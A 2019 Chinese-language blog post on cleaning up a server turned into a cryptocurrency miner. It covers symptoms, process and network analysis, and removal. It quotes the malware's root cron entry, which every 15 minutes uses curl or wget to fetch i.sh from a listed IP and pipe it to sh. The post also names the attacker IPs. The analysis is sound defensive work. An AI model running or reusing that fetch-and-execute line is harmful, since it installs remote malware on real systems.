服务器被攻击后当作矿机,高WIO

矿机特点:
  
  1. 操作系统反应慢。
  2. wio 非常高,一般轻松达到50%,甚至达到100%。
  3.  在/root/ 下存在 .ddg 隐藏路径。路径中有nnnn.db 二进制文件。
  4.  /tmp 、/usr/libexec 、/usr/bin 等一个或者多个路径中存在 新增可执行文件,如果存在多个,则名称上来看,无实际意义。文件大小几乎相同 ,通过diff命令,可执行文件无区别。
  5.  存在连接至国外的网络。
  6.  使用root 登录,并为root用户添加定时任务。一般为每15分钟连接外网下载名为 “i.sh”的文件并执行。

预防方法:

 

  1. 网络:禁止外网访问,严格控制进出端口。
  2. 服务器:禁止root直接远程登录,禁止Ping 服务器
  3. 软件:软件不使用默认端口,很多黑客是通过软件的默认端口和漏洞进行攻击的。
    

下面是本次处理的过程。主要采用处理的方法是添加网络防火墙,禁止访问某个IP段 。下面是分析过程

 

主机CPU消耗过高

 

红框标注的内容,都是可疑进程。从名字上来看,是两类:vTtHH* 和ldrlfa* 。 先来看vTtHH* 这一类。

 

进程8907的父进程是1, 一般这种情况是由守护进程发起的。可是 守护进程没找到 。因为守护进程的名字有可能是经过伪装的。

而该文件存放于/tmp/路径中:

 

 

红框中的文件,是随机生成的文件,文件名不一定有规律,但是文件大小相近,内容相同:

 

这些文件都是编译过的二进制文件。是C/C++可执行文件。

没有进程在使用这些文件。

 

继续查看下ldrlfa* 这类命令。

 

可以看到分别于4月30日与5月11日,启动了两个命令:ldrlfa2 /ldrlfa3.这些命令存放于/usr/bin/.

 

发现这类文件会重复生成,生成的时间并没有什么规律 。




定时任务

 


*/15 * * * * (/usr/bin/ldrlfa3||/usr/libexec/ldrlfa3||/usr/local/bin/ldrlfa3||/tmp/ldrlfa3||curl -m180 -fsSL http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh

每15分钟,执行一次,调用/usr/bin, /usr/libexec, /usr/local/bin /tmp 路径下去查找

Ldrlfa3 命令, 并从104.128.230.16:8000 下载i.sh 文件并执行。

追踪进程

[root@~ tmp]# lsof -p 16265

COMMAND   PID USER   FD      TYPE    DEVICE SIZE/OFF      NODE NAME

ldrlfa2 16265 root  cwd       DIR     253,0    49152 805306441 /usr/bin

ldrlfa2 16265 root  rtd       DIR     253,0      275        64 /

ldrlfa2 16265 root  txt       REG     253,0  4446828 8262721626 /usr/bin/ldrlfa2

ldrlfa2 16265 root  mem-W     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    0r      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    1w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    2w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    3r      CHR       1,9      0t0      4792 /dev/urandom

ldrlfa2 16265 root    4u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root    5uW     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    6u     IPv6 231916470      0t0       TCP *:7946 (LISTEN)

ldrlfa2 16265 root    7u     IPv6 231916471      0t0       UDP *:7946 

ldrlfa2 16265 root    8u     IPv4 260937900      0t0       TCP ~:19290->211.151.7.198:7946 (SYN_SENT)

ldrlfa2 16265 root    9r  a_inode       0,9        0      4783 inotify

ldrlfa2 16265 root   10u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   11r     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   12w     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   13u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   14r     FIFO       0,8      0t0 231916473 pipe

ldrlfa2 16265 root   15w     FIFO       0,8      0t0 231916473 pipe

[root@pmo02 tmp]# cd /root/.ddg/

[root@pmo02 .ddg]# ls

4000.db  4001.db  4002.db  4003.db

[root@~ .ddg]# ls -lrt

总用量 96

-rw------- 1 root root 32768 4月  30 15:26 4001.db

-rw------- 1 root root 32768 5月   4 19:48 4000.db

-rw------- 1 root root 32768 5月  16 17:25 4003.db

-rw------- 1 root root 32768 5月  16 17:29 4002.db

[root@~ .ddg]# cat 4001.db 

ZCmd.Processed@<84\#\,\stBucket

;P_+R d(+˺z<?f0+qkwj"yHQGf0HqЎfзKo/

|H|˕bf*+8a+{w<1iky/&Df.k

z/!lAfHQh_O_qЎf_kw;Pv*4!G/

                     w;8ڀ}2Et5>sz֎<pyѵk

GrCfS

U7~
vux9w'!

R


从追踪进程来看,挖矿进程,会将本机的 19290端口转发至211.151.7.198:7946端口. 

 

在/root 路径下自动创建了隐藏文件夹.ddg/ ,该路径下存放着 几个 nnnn.db ,而该文件是二进制文件。看不懂。 直接将.ddg 删除。


网络分析

检查当前主机上的网络连接,发现部分异常IP和端口(挖矿进程是需要与外网进行通信的)。从主机上查看:

 

94.130.49.186    --> 乌克兰

95.216.74.37      --> 乌克兰

182.92.12.11      --> 北京大兴,阿里云

5.79.108.34        --> 荷兰

104.128.230.16  --> 美国


从最终处理结果来看,这是一个正确的方向。

处理方法

将以上发现的定时任务、可执行文件内容全部删除 。

同时防火墙拒绝以上5个地址的全IP段,同时拒绝下载i.sh 文件的IP网络。


添加防火墙策略示例如下:


Iptables –I INPUT 94.0.0.0/8 –j DROP 


添加完成后,需要执行service iptables save 将策略保存


posted @ 2019-05-17 14:53  halberd.lee  阅读(1206)  评论(0编辑  收藏  举报